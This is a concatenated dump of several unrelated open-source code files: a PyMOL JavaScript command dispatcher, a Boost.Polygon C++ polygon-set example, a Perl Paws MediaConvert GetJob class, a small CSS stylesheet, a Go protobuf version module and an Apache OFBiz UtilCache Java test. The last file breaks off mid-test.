fix_chemistry: function() {\n return this._dispatch.apply(this,\n [\"fix_chemistry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n flag: function() {\n return this._dispatch.apply(this,\n [\"flag\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fuse: function() {\n return this._dispatch.apply(this,\n [\"fuse\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_editor_scheme: function() {\n return this._dispatch.apply(this,\n [\"get_editor_scheme\"].concat(Array.prototype.slice.apply(arguments)));\n },\n h_add: function() {\n return this._dispatch.apply(this,\n [\"h_add\"].concat(Array.prototype.slice.apply(arguments)));\n },\n h_fill: function() {\n return this._dispatch.apply(this,\n [\"h_fill\"].concat(Array.prototype.slice.apply(arguments)));\n },\n h_fix: function() {\n return this._dispatch.apply(this,\n [\"h_fix\"].concat(Array.prototype.slice.apply(arguments)));\n },\n invert: function() {\n return this._dispatch.apply(this,\n [\"invert\"].concat(Array.prototype.slice.apply(arguments)));\n },\n torsion: function() {\n return this._dispatch.apply(this,\n [\"torsion\"].concat(Array.prototype.slice.apply(arguments)));\n },\n valence: function() {\n return this._dispatch.apply(this,\n [\"valence\"].concat(Array.prototype.slice.apply(arguments)));\n },\n clean: function() {\n return this._dispatch.apply(this,\n [\"clean\"].concat(Array.prototype.slice.apply(arguments)));\n },\n deprotect: function() {\n return this._dispatch.apply(this,\n [\"deprotect\"].concat(Array.prototype.slice.apply(arguments)));\n },\n protect: function() {\n return this._dispatch.apply(this,\n [\"protect\"].concat(Array.prototype.slice.apply(arguments)));\n },\n reference: function() {\n return this._dispatch.apply(this,\n [\"reference\"].concat(Array.prototype.slice.apply(arguments)));\n },\n remove: function() {\n return this._dispatch.apply(this,\n [\"remove\"].concat(Array.prototype.slice.apply(arguments)));\n },\n remove_picked: function() {\n return this._dispatch.apply(this,\n [\"remove_picked\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rename: function() {\n return this._dispatch.apply(this,\n [\"rename\"].concat(Array.prototype.slice.apply(arguments)));\n },\n replace: function() {\n return this._dispatch.apply(this,\n [\"replace\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_purge: function() {\n return this._dispatch.apply(this,\n [\"sculpt_purge\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_deactivate: function() {\n return this._dispatch.apply(this,\n [\"sculpt_deactivate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_activate: function() {\n return this._dispatch.apply(this,\n [\"sculpt_activate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_iterate: function() {\n return this._dispatch.apply(this,\n [\"sculpt_iterate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_geometry: function() {\n return this._dispatch.apply(this,\n [\"set_geometry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_symmetry: function() {\n return this._dispatch.apply(this,\n [\"set_symmetry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_title: function() {\n return this._dispatch.apply(this,\n [\"set_title\"].concat(Array.prototype.slice.apply(arguments)));\n },\n smooth: function() {\n return this._dispatch.apply(this,\n [\"smooth\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sort: function() {\n return this._dispatch.apply(this,\n [\"sort\"].concat(Array.prototype.slice.apply(arguments)));\n },\n undo: function() {\n return this._dispatch.apply(this,\n [\"undo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n push_undo: function() {\n return this._dispatch.apply(this,\n [\"push_undo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n redo: function() {\n return this._dispatch.apply(this,\n [\"redo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n wizard: function() {\n return this._dispatch.apply(this,\n [\"wizard\"].concat(Array.prototype.slice.apply(arguments)));\n },\n replace_wizard: function() {\n return this._dispatch.apply(this,\n [\"replace_wizard\"].concat(Array.prototype.slice.apply(arguments)));\n },\n count_frames: function() {\n return this._dispatch.apply(this,\n [\"count_frames\"].concat(Array.prototype.slice.apply(arguments)));\n },\n count_states: function() {\n return this._dispatch.apply(this,\n [\"count_states\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mset: function() {\n return this._dispatch.apply(this,\n [\"mset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n madd: function() {\n return this._dispatch.apply(this,\n [\"madd\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mclear: function() {\n return this._dispatch.apply(this,\n [\"mclear\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mmatrix: function() {\n return this._dispatch.apply(this,\n [\"mmatrix\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mdump: function() {\n return this._dispatch.apply(this,\n [\"mdump\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mview: function() {\n return this._dispatch.apply(this,\n [\"mview\"].concat(Array.prototype.slice.apply(arguments)));\n },\n forward: function() {\n return this._dispatch.apply(this,\n [\"forward\"].concat(Array.prototype.slice.apply(arguments)));\n },\n backward: function() {\n return this._dispatch.apply(this,\n [\"backward\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rewind: function() {\n return this._dispatch.apply(this,\n [\"rewind\"].concat(Array.prototype.slice.apply(arguments)));\n },\n middle: function() {\n return this._dispatch.apply(this,\n [\"middle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ending: function() {\n return this._dispatch.apply(this,\n [\"ending\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mplay: function() {\n return this._dispatch.apply(this,\n [\"mplay\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mtoggle: function() {\n return this._dispatch.apply(this,\n [\"mtoggle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mstop: function() {\n return this._dispatch.apply(this,\n [\"mstop\"].concat(Array.prototype.slice.apply(arguments)));\n },\n frame: function() {\n return this._dispatch.apply(this,\n [\"frame\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_movie_playing: function() {\n return this._dispatch.apply(this,\n [\"get_movie_playing\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_state: function() {\n return this._dispatch.apply(this,\n [\"get_state\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_frame: function() {\n return this._dispatch.apply(this,\n [\"get_frame\"].concat(Array.prototype.slice.apply(arguments)));\n },\n view: function() {\n return this._dispatch.apply(this,\n [\"view\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_scene_list: function() {\n return this._dispatch.apply(this,\n [\"get_scene_list\"].concat(Array.prototype.slice.apply(arguments)));\n },\n scene: function() {\n return this._dispatch.apply(this,\n [\"scene\"].concat(Array.prototype.slice.apply(arguments)));\n },\n scene_order: function() {\n return this._dispatch.apply(this,\n [\"scene_order\"].concat(Array.prototype.slice.apply(arguments)));\n }\n\n // END MACHINE-GENERATED CODE\n\n }\n \n this.getattr = {\n dispatch: function(attrname) {\n if (attrname) {\n mypath = \"/getattr/pymol.\" + attrname;\n this._outer._send(mypath);\n }\n }\n // viewing: function() {\n // this._dispatch(\"viewing\");\n // }\n }\n\n // enable inner pseudo-inner-instance to find the outer instance\n\n this.cmd._outer = this\n this.getattr._outer = this\n}\n\n// utility functions not used above, but of use to some users, one hopes\nfunction parse_file(f) {\n var re = /[\\\\\\/]/;\n fields = f.split(re);\n filename = fields[fields.length-1];\n dot = filename.lastIndexOf('.');\n if (dot > -1) {\n name = filename.slice(0,dot);\n ext = filename.slice(dot);\n } else {\n name = filename;\n ext = \"\";\n }\n // Javascript 1.7+ only in Mozilla?\n // return [name, ext];\n return new Array(name, ext);\n}\nfunction validate_file(n,f) {\n if (f.value) {\n // Javascript 1.7+ only in Mozilla?\n // [name, ext] = parse_file(f.value);\n parsed = parse_file(f.value);\n name = parsed[0];\n ext = parsed[1];\n if (name) {\n n.value = name;\n //add_checkbox(name, \"objects\");\n return true;\n } else {\n alert('cannot extract name from file');\n return false;\n }\n } else {\n alert('no file selected');\n return false;\n }\n}\n"} {"text": "/*\nCopyright 2008 Intel Corporation\n\nUse, modification and distribution are subject to the Boost Software License,\nVersion 1.0. (See accompanying file LICENSE_1_0.txt or copy at\nhttp://www.boost.org/LICENSE_1_0.txt).\n*/\n#include \n#include \n#include \n#include \n#include \n#include \nnamespace gtl = boost::polygon;\nusing namespace boost::polygon::operators;\n\n//once again we make our usage of the library generic\n//and parameterize it on the polygon set type\ntemplate \nvoid test_polygon_set() {\n using namespace gtl;\n PolygonSet ps;\n ps += rectangle_data(0, 0, 10, 10);\n PolygonSet ps2;\n ps2 += rectangle_data(5, 5, 15, 15);\n PolygonSet ps3;\n assign(ps3, ps * ps2);\n PolygonSet ps4;\n ps4 += ps + ps2;\n assert(area(ps4) == area(ps) + area(ps2) - area(ps3));\n assert(equivalence((ps + ps2) - (ps * ps2), ps ^ ps2));\n rectangle_data rect;\n assert(extents(rect, ps ^ ps2));\n assert(area(rect) == 225);\n assert(area(rect ^ (ps ^ ps2)) == area(rect) - area(ps ^ ps2));\n}\n\n//first thing is first, lets include all the code from previous examples\n\n//the CPoint example\nstruct CPoint {\n int x;\n int y;\n};\n\nnamespace boost { namespace polygon {\n template <>\n struct geometry_concept { typedef point_concept type; };\n template <>\n struct point_traits {\n typedef int coordinate_type;\n\n static inline coordinate_type get(const CPoint& point,\n\t\t\t\t\torientation_2d orient) {\n\tif(orient == HORIZONTAL)\n\t return point.x;\n\treturn point.y;\n }\n };\n\n template <>\n struct point_mutable_traits {\n typedef int coordinate_type;\n\n static inline void set(CPoint& point, orientation_2d orient, int value) {\n\tif(orient == HORIZONTAL)\n\t point.x = value;\n\telse\n\t point.y = value;\n }\n static inline CPoint construct(int x_value, int y_value) {\n\tCPoint retval;\n\tretval.x = x_value;\n\tretval.y = y_value;\n\treturn retval;\n }\n };\n } }\n\n//the CPolygon example\ntypedef std::list CPolygon;\n\n//we need to specialize our polygon concept mapping in boost polygon\nnamespace boost { namespace polygon {\n //first register CPolygon as a polygon_concept type\n template <>\n struct geometry_concept{ typedef polygon_concept type; };\n\n template <>\n struct polygon_traits {\n typedef int coordinate_type;\n typedef CPolygon::const_iterator iterator_type;\n typedef CPoint point_type;\n\n // Get the begin iterator\n static inline iterator_type begin_points(const CPolygon& t) {\n\treturn t.begin();\n }\n\n // Get the end iterator\n static inline iterator_type end_points(const CPolygon& t) {\n\treturn t.end();\n }\n\n // Get the number of sides of the polygon\n static inline std::size_t size(const CPolygon& t) {\n\treturn t.size();\n }\n\n // Get the winding direction of the polygon\n static inline winding_direction winding(const CPolygon& t) {\n\treturn unknown_winding;\n }\n };\n\n template <>\n struct polygon_mutable_traits {\n //expects stl style iterators\n template \n static inline CPolygon& set_points(CPolygon& t,\n\t\t\t\t\t iT input_begin, iT input_end) {\n\tt.clear();\n\twhile(input_begin != input_end) {\n\t t.push_back(CPoint());\n\t gtl::assign(t.back(), *input_begin);\n\t ++input_begin;\n\t}\n\treturn t;\n }\n\n };\n } }\n\n//OK, finally we get to declare our own polygon set type\ntypedef std::deque CPolygonSet;\n\n//deque isn't automatically a polygon set in the library\n//because it is a standard container there is a shortcut\n//for mapping it to polygon set concept, but I'll do it\n//the long way that you would use in the general case.\nnamespace boost { namespace polygon {\n //first we register CPolygonSet as a polygon set\n template <>\n struct geometry_concept { typedef polygon_set_concept type; };\n\n //next we map to the concept through traits\n template <>\n struct polygon_set_traits {\n typedef int coordinate_type;\n typedef CPolygonSet::const_iterator iterator_type;\n typedef CPolygonSet operator_arg_type;\n\n static inline iterator_type begin(const CPolygonSet& polygon_set) {\n\treturn polygon_set.begin();\n }\n\n static inline iterator_type end(const CPolygonSet& polygon_set) {\n\treturn polygon_set.end();\n }\n\n //don't worry about these, just return false from them\n static inline bool clean(const CPolygonSet& polygon_set) { return false; }\n static inline bool sorted(const CPolygonSet& polygon_set) { return false; }\n };\n\n template <>\n struct polygon_set_mutable_traits {\n template \n static inline void set(CPolygonSet& polygon_set, input_iterator_type input_begin, input_iterator_type input_end) {\n\tpolygon_set.clear();\n\t//this is kind of cheesy. I am copying the unknown input geometry\n\t//into my own polygon set and then calling get to populate the\n\t//deque\n\tpolygon_set_data ps;\n\tps.insert(input_begin, input_end);\n\tps.get(polygon_set);\n\t//if you had your own odd-ball polygon set you would probably have\n\t//to iterate through each polygon at this point and do something\n\t//extra\n }\n };\n} }\n\nint main() {\n long long c1 = clock();\n for(int i = 0; i < 1000; ++i)\n test_polygon_set();\n long long c2 = clock();\n for(int i = 0; i < 1000; ++i)\n test_polygon_set >();\n long long c3 = clock();\n long long diff1 = c2 - c1;\n long long diff2 = c3 - c2;\n if(diff1 > 0 && diff2)\n std::cout << \"library polygon_set_data is \" << float(diff1)/float(diff2) << \"X faster than custom polygon set deque of CPolygon\" << std::endl;\n else\n std::cout << \"operation was too fast\" << std::endl;\n return 0;\n}\n\n//Now you know how to map your own data type to polygon set concept\n//Now you also know how to make your application code that operates on geometry\n//data type agnostic from point through polygon set\n"} {"text": "\npackage Paws::MediaConvert::GetJob;\n use Moose;\n has Id => (is => 'ro', isa => 'Str', traits => ['ParamInURI'], uri_name => 'id', required => 1);\n\n use MooseX::ClassAttribute;\n\n class_has _api_call => (isa => 'Str', is => 'ro', default => 'GetJob');\n class_has _api_uri => (isa => 'Str', is => 'ro', default => '/2017-08-29/jobs/{id}');\n class_has _api_method => (isa => 'Str', is => 'ro', default => 'GET');\n class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::MediaConvert::GetJobResponse');\n1;\n\n### main pod documentation begin ###\n\n=head1 NAME\n\nPaws::MediaConvert::GetJob - Arguments for method GetJob on L\n\n=head1 DESCRIPTION\n\nThis class represents the parameters used for calling the method GetJob on the\nL service. Use the attributes of this class\nas arguments to method GetJob.\n\nYou shouldn't make instances of this class. Each attribute should be used as a named argument in the call to GetJob.\n\n=head1 SYNOPSIS\n\n my $mediaconvert = Paws->service('MediaConvert');\n my $GetJobResponse = $mediaconvert->GetJob(\n Id => 'My__string',\n\n );\n\n # Results:\n my $Job = $GetJobResponse->Job;\n\n # Returns a L object.\n\nValues for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.\nFor the AWS API documentation, see L\n\n=head1 ATTRIBUTES\n\n\n=head2 B Id => Str\n\nthe job ID of the job.\n\n\n\n\n=head1 SEE ALSO\n\nThis class forms part of L, documenting arguments for method GetJob in L\n\n=head1 BUGS and CONTRIBUTIONS\n\nThe source code is located here: L\n\nPlease report bugs to: L\n\n=cut\n\n"} {"text": ".label-success{\n font-size: 17;\n color: #18b58b;\n font-weight: 600;\n}\n\n.label-failed{\n font-size: 17;\n color: #fa0909;\n font-weight: 600;\n}\n\n.label-category{\n color: #606060;\n font-size: 15;\n}\n\n.user-name{\n padding-top:3;\n color:#616161;\n font-size: 17;\n}\n.label-score{\n color: #8c8c8c;\n font-size: 15;\n}\n\n.border-left{\n border-color: #dfdfdf;\n border-width: 0 2 0 0;\n border-style: dotted;\n width: 95%;\n height: 1;\n}"} {"text": "// Copyright 2019 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n// Package version records versioning information about this module.\npackage version\n\nimport (\n\t\"fmt\"\n\t\"strings\"\n)\n\n// These constants determine the current version of this module.\n//\n//\n// For our release process, we enforce the following rules:\n//\t* Tagged releases use a tag that is identical to String.\n//\t* Tagged releases never reference a commit where the String\n//\tcontains \"devel\".\n//\t* The set of all commits in this repository where String\n//\tdoes not contain \"devel\" must have a unique String.\n//\n//\n// Steps for tagging a new release:\n//\t1. Create a new CL.\n//\n//\t2. Update Minor, Patch, and/or PreRelease as necessary.\n//\tPreRelease must not contain the string \"devel\".\n//\n//\t3. Since the last released minor version, have there been any changes to\n//\tgenerator that relies on new functionality in the runtime?\n//\tIf yes, then increment RequiredGenerated.\n//\n//\t4. Since the last released minor version, have there been any changes to\n//\tthe runtime that removes support for old .pb.go source code?\n//\tIf yes, then increment SupportMinimum.\n//\n//\t5. Send out the CL for review and submit it.\n//\tNote that the next CL in step 8 must be submitted after this CL\n//\twithout any other CLs in-between.\n//\n//\t6. Tag a new version, where the tag is is the current String.\n//\n//\t7. Write release notes for all notable changes\n//\tbetween this release and the last release.\n//\n//\t8. Create a new CL.\n//\n//\t9. Update PreRelease to include the string \"devel\".\n//\tFor example: \"\" -> \"devel\" or \"rc.1\" -> \"rc.1.devel\"\n//\n//\t10. Send out the CL for review and submit it.\nconst (\n\tMajor = 1\n\tMinor = 23\n\tPatch = 0\n\tPreRelease = \"\"\n)\n\n// String formats the version string for this module in semver format.\n//\n// Examples:\n//\tv1.20.1\n//\tv1.21.0-rc.1\nfunc String() string {\n\tv := fmt.Sprintf(\"v%d.%d.%d\", Major, Minor, Patch)\n\tif PreRelease != \"\" {\n\t\tv += \"-\" + PreRelease\n\n\t\t// TODO: Add metadata about the commit or build hash.\n\t\t// See https://golang.org/issue/29814\n\t\t// See https://golang.org/issue/33533\n\t\tvar metadata string\n\t\tif strings.Contains(PreRelease, \"devel\") && metadata != \"\" {\n\t\t\tv += \"+\" + metadata\n\t\t}\n\t}\n\treturn v\n}\n"} {"text": "/*\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing,\n * software distributed under the License is distributed on an\n * \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n * KIND, either express or implied. See the License for the\n * specific language governing permissions and limitations\n * under the License.\n */\npackage org.apache.ofbiz.base.util.cache;\n\nimport static org.apache.ofbiz.base.test.GenericTestCaseBase.useAllMemory;\nimport static org.hamcrest.MatcherAssert.assertThat;\nimport static org.hamcrest.Matchers.containsInAnyOrder;\nimport static org.hamcrest.Matchers.greaterThan;\nimport static org.junit.Assert.assertEquals;\nimport static org.junit.Assert.assertFalse;\nimport static org.junit.Assert.assertNotSame;\nimport static org.junit.Assert.assertNull;\nimport static org.junit.Assert.assertSame;\nimport static org.junit.Assert.assertTrue;\n\nimport java.io.Serializable;\nimport java.util.Collections;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.Map;\nimport java.util.Objects;\nimport java.util.Set;\n\nimport org.apache.ofbiz.base.util.UtilMisc;\nimport org.apache.ofbiz.base.util.UtilObject;\nimport org.junit.Test;\n\n@SuppressWarnings(\"serial\")\npublic class UtilCacheTests implements Serializable {\n abstract static class Change {\n private int count = 1;\n\n public int getCount() {\n return count;\n }\n\n public void incCount() {\n count += 1;\n }\n }\n\n protected static final class Removal extends Change {\n private final V oldValue;\n\n protected Removal(V oldValue) {\n this.oldValue = oldValue;\n }\n\n @Override\n public int hashCode() {\n return UtilObject.doHashCode(oldValue);\n }\n\n @Override\n public boolean equals(Object o) {\n if (o instanceof Removal) {\n Removal other = (Removal) o;\n return Objects.equals(oldValue, other.oldValue);\n }\n return false;\n }\n }\n\n protected static final class Addition extends Change {\n private final V newValue;\n\n protected Addition(V newValue) {\n this.newValue = newValue;\n }\n\n @Override\n public int hashCode() {\n return UtilObject.doHashCode(newValue);\n }\n\n @Override\n public boolean equals(Object o) {\n if (o instanceof Addition) {\n Addition other = (Addition) o;\n return Objects.equals(newValue, other.newValue);\n }\n return false;\n }\n }\n\n protected static final class Update extends Change {\n private final V newValue;\n private final V oldValue;\n\n protected Update(V newValue, V oldValue) {\n this.newValue = newValue;\n this.oldValue = oldValue;\n }\n\n @Override\n public int hashCode() {\n return UtilObject.doHashCode(newValue) ^ UtilObject.doHashCode(oldValue);\n }\n\n @Override\n public boolean equals(Object o) {\n if (o instanceof Update) {\n Update other = (Update) o;\n if (!Objects.equals(newValue, other.newValue)) {\n return false;\n }\n return Objects.equals(oldValue, other.oldValue);\n }\n return false;\n }\n }\n\n private static final class Listener implements CacheListener {\n private Map> changeMap = new HashMap<>();\n\n private void add(K key, Change change) {\n Set changeSet = changeMap.get(key);\n if (changeSet == null) {\n changeSet = new HashSet<>();\n changeMap.put(key, changeSet);\n }\n for (Change checkChange: changeSet) {\n if (checkChange.equals(change)) {\n checkChange.incCount();\n return;\n }\n }\n changeSet.add(change);\n }\n\n @Override\n public synchronized void noteKeyRemoval(UtilCache cache, K key, V oldValue) {\n add(key, new Removal<>(oldValue));\n }\n\n @Override\n public synchronized void noteKeyAddition(UtilCache cache, K key, V newValue) {\n add(key, new Addition<>(newValue));\n }\n\n @Override\n public synchronized void noteKeyUpdate(UtilCache cache, K key, V newValue, V oldValue) {\n add(key, new Update<>(newValue, oldValue));\n }\n\n @Override\n public boolean equals(Object o) {\n if (!(o instanceof Listener)) {\n return false;\n }\n Listener other = (Listener) o;\n return changeMap.equals(other.changeMap);\n }\n\n @Override\n public int hashCode() {\n return super.hashCode();\n }\n }\n\n private static Listener createListener(UtilCache cache) {\n Listener listener = new Listener<>();\n cache.addListener(listener);\n return listener;\n }\n\n private UtilCache createUtilCache(int sizeLimit, int maxInMemory, long ttl, boolean useSoftReference) {\n return UtilCache.createUtilCache(getClass().getName(), sizeLimit, maxInMemory, ttl, useSoftReference);\n }\n\n private static void assertUtilCacheSettings(UtilCache cache, Integer sizeLimit, Integer maxInMemory,\n Long expireTime, Boolean useSoftReference) {\n if (sizeLimit != null) {\n assertEquals(cache.getName() + \":sizeLimit\", sizeLimit.intValue(), cache.getSizeLimit());\n }\n if (maxInMemory != null) {\n assertEquals(cache.getName() + \":maxInMemory\", maxInMemory.intValue(), cache.getMaxInMemory());\n }\n if (expireTime != null) {\n assertEquals(cache.getName() + \":expireTime\", expireTime.longValue(), cache.getExpireTime());\n }\n if (useSoftReference != null) {\n assertEquals(cache.getName() + \":useSoftReference\", useSoftReference.booleanValue(),\n cache.getUseSoftReference());\n }\n assertEquals(\"initial empty\", true, cache.isEmpty());\n assertEquals(\"empty keys\", Collections.emptySet(), cache.getCacheLineKeys());\n assertEquals(\"empty values\", Collections.emptyList(), cache.values());\n assertSame(\"find cache\", cache, UtilCache.findCache(cache.getName()));\n assertNotSame(\"new cache\", cache, UtilCache.createUtilCache());\n }\n\n @Test\n public void testCreateUtilCache() {\n String name = getClass().getName();\n assertUtilCacheSettings(UtilCache.createUtilCache(), null, null, null, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name), null, null, null, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, false), null, null, null, Boolean.FALSE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, true), null, null, null, Boolean.TRUE);\n assertUtilCacheSettings(UtilCache.createUtilCache(5, 15000), 5, null, 15000L, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 6, 16000), 6, null, 16000L, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 7, 17000, false), 7, null, 17000L, Boolean.FALSE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 8, 18000, true), 8, null, 18000L, Boolean.TRUE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 9, 5, 19000, false), 9, 5, 19000L, Boolean.FALSE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 10, 6, 20000, false), 10, 6, 20000L, Boolean.FALSE);\n assertUtilCacheSettings(\n UtilCache.createUtilCache(name, 11, 7, 21000, false, \"a\", \"b\"), 11, 7, 21000L, Boolean.FALSE);\n assertUtilCacheSettings(\n UtilCache.createUtilCache(name, 12, 8, 22000, false, \"c\", \"d\"), 12, 8, 22000L, Boolean.FALSE);\n }\n\n public static void assertKey(String label, UtilCache cache, K key, V value, V other, int size,\n Map map) {\n assertNull(label + \":get-empty\", cache.get(key));\n assertFalse(label + \":containsKey-empty\", cache.containsKey(key));\n V oldValue = cache.put(key, other);\n assertTrue(label + \":containsKey-class\", cache.containsKey(key));\n assertEquals(label + \":get-class\", other, cache.get(key));\n assertNull(label + \":oldValue-class\", oldValue);\n assertEquals(label + \":size-class\", size, cache.size());\n oldValue = cache.put(key, value);\n assertTrue(label + \":containsKey-value\", cache.containsKey(key));\n assertEquals(label + \":get-value\", value, cache.get(key));\n assertEquals(label + \":oldValue-value\", other, oldValue);\n assertEquals(label + \":size-value\", size, cache.size());\n map.put(key, value);\n assertEquals(label + \":map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(label + \":map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n }\n\n private static void assertHasSingleKey(UtilCache cache, K key, V value) {\n assertFalse(\"is-empty\", cache.isEmpty());\n assertEquals(\"size\", 1, cache.size());\n assertTrue(\"found\", cache.containsKey(key));\n assertTrue(\"validKey\", UtilCache.validKey(cache.getName(), key));\n assertFalse(\"validKey\", UtilCache.validKey(\":::\" + cache.getName(), key));\n assertEquals(\"get\", value, cache.get(key));\n assertEquals(\"keys\", new HashSet<>(UtilMisc.toList(key)), cache.getCacheLineKeys());\n assertEquals(\"values\", UtilMisc.toList(value), cache.values());\n }\n\n private static void assertNoSingleKey(UtilCache cache, K key) {\n assertFalse(\"not-found\", cache.containsKey(key));\n assertFalse(\"validKey\", UtilCache.validKey(cache.getName(), key));\n assertNull(\"no-get\", cache.get(key));\n assertNull(\"remove\", cache.remove(key));\n assertTrue(\"is-empty\", cache.isEmpty());\n assertEquals(\"size\", 0, cache.size());\n assertEquals(\"keys\", Collections.emptySet(), cache.getCacheLineKeys());\n assertEquals(\"values\", Collections.emptyList(), cache.values());\n }\n\n private static void basicTest(UtilCache cache) throws Exception {\n Listener gotListener = createListener(cache);\n Listener wantedListener = new Listener<>();\n for (int i = 0; i < 2; i++) {\n assertTrue(\"UtilCacheTable.keySet\", UtilCache.getUtilCacheTableKeySet().contains(cache.getName()));\n assertSame(\"UtilCache.findCache\", cache, UtilCache.findCache(cache.getName()));\n assertSame(\"UtilCache.getOrCreateUtilCache\", cache, UtilCache.getOrCreateUtilCache(cache.getName(),\n cache.getSizeLimit(), cache.getMaxInMemory(), cache.getExpireTime(), cache.getUseSoftReference()));\n\n assertNoSingleKey(cache, \"one\");\n long origByteSize = cache.getSizeInBytes();\n\n wantedListener.noteKeyAddition(cache, null, \"null\");\n assertNull(\"put\", cache.put(null, \"null\"));\n assertHasSingleKey(cache, null, \"null\");\n long nullByteSize = cache.getSizeInBytes();\n assertThat(nullByteSize, greaterThan(origByteSize));\n\n wantedListener.noteKeyRemoval(cache, null, \"null\");\n assertEquals(\"remove\", \"null\", cache.remove(null));\n assertNoSingleKey(cache, null);\n\n wantedListener.noteKeyAddition(cache, \"one\", \"uno\");\n assertNull(\"put\", cache.put(\"one\", \"uno\"));\n assertHasSingleKey(cache, \"one\", \"uno\");\n long unoByteSize = cache.getSizeInBytes();\n assertThat(unoByteSize, greaterThan(origByteSize));\n\n wantedListener.noteKeyUpdate(cache, \"one\", \"single\", \"uno\");\n assertEquals(\"replace\", \"uno\", cache.put(\"one\", \"single\"));\n assertHasSingleKey(cache, \"one\", \"single\");\n long singleByteSize = cache.getSizeInBytes();\n assertThat(singleByteSize, greaterThan(origByteSize));\n assertThat(singleByteSize, greaterThan(unoByteSize));\n\n wantedListener.noteKeyRemoval(cache, \"one\", \"single\");\n assertEquals(\"remove\", \"single\", cache.remove(\"one\"));\n assertNoSingleKey(cache, \"one\");\n assertEquals(\"byteSize\", origByteSize, cache.getSizeInBytes());\n\n wantedListener.noteKeyAddition(cache, \"one\", \"uno\");\n assertNull(\"put\", cache.put(\"one\", \"uno\"));\n assertHasSingleKey(cache, \"one\", \"uno\");\n\n wantedListener.noteKeyUpdate(cache, \"one\", \"only\", \"uno\");\n assertEquals(\"replace\", \"uno\", cache.put(\"one\", \"only\"));\n assertHasSingleKey(cache, \"one\", \"only\");\n\n wantedListener.noteKeyRemoval(cache, \"one\", \"only\");\n cache.erase();\n assertNoSingleKey(cache, \"one\");\n assertEquals(\"byteSize\", origByteSize, cache.getSizeInBytes());\n\n cache.setExpireTime(100);\n wantedListener.noteKeyAddition(cache, \"one\", \"uno\");\n assertNull(\"put\", cache.put(\"one\", \"uno\"));\n assertHasSingleKey(cache, \"one\", \"uno\");\n\n wantedListener.noteKeyRemoval(cache, \"one\", \"uno\");\n Thread.sleep(200);\n assertNoSingleKey(cache, \"one\");\n }\n\n assertEquals(\"get-miss\", 10, cache.getMissCountNotFound());\n assertEquals(\"get-miss-total\", 10, cache.getMissCountTotal());\n assertEquals(\"get-hit\", 12, cache.getHitCount());\n assertEquals(\"remove-hit\", 6, cache.getRemoveHitCount());\n assertEquals(\"remove-miss\", 10, cache.getRemoveMissCount());\n cache.removeListener(gotListener);\n assertEquals(\"listener\", wantedListener, gotListener);\n UtilCache.clearCache(cache.getName());\n UtilCache.clearCache(\":::\" + cache.getName());\n }\n\n @Test\n public void testSimple() throws Exception {\n UtilCache cache = createUtilCache(5, 0, 0, false);\n basicTest(cache);\n }\n\n @Test\n public void testPutIfAbsent() throws Exception {\n UtilCache cache = createUtilCache(5, 5, 2000, false);\n Listener gotListener = createListener(cache);\n Listener wantedListener = new Listener<>();\n wantedListener.noteKeyAddition(cache, \"two\", \"dos\");\n assertNull(\"putIfAbsent\", cache.putIfAbsent(\"two\", \"dos\"));\n assertHasSingleKey(cache, \"two\", \"dos\");\n assertEquals(\"putIfAbsent\", \"dos\", cache.putIfAbsent(\"two\", \"double\"));\n assertHasSingleKey(cache, \"two\", \"dos\");\n cache.removeListener(gotListener);\n assertEquals(\"listener\", wantedListener, gotListener);\n }\n\n @Test\n public void testPutIfAbsentAndGet() throws Exception {\n UtilCache cache = createUtilCache(5, 5, 2000, false);\n Listener gotListener = createListener(cache);\n Listener wantedListener = new Listener<>();\n wantedListener.noteKeyAddition(cache, \"key\", \"value\");\n wantedListener.noteKeyAddition(cache, 